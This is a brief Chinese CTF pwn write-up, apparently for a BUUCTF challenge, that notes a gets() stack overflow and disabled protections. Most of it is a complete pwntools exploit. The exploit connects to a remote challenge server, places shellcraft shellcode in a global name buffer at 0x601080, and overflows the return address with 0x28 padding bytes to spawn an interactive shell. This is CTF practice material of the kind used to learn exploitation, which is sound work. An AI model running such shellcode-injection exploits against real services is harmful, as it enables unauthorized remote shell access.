0x1 checksec
没有开启保护,有可写segments,考虑shellcode
0x2 IDA
1.main
gets()函数溢出点
偏移量
栈溢出到shellcode,getshell
0x3 EXP
from pwn import *
context.log_level="debug"
p=remote("node4.buuoj.cn",29553)
context.arch="amd64"
shellcode=asm(shellcraft.sh())
name=0x601080
p.recvuntil("name\n")
p.sendline(shellcode)
p.recvuntil("?\n")
payload="A"*0x28+p64(name)
p.sendline(payload)
p.interactive()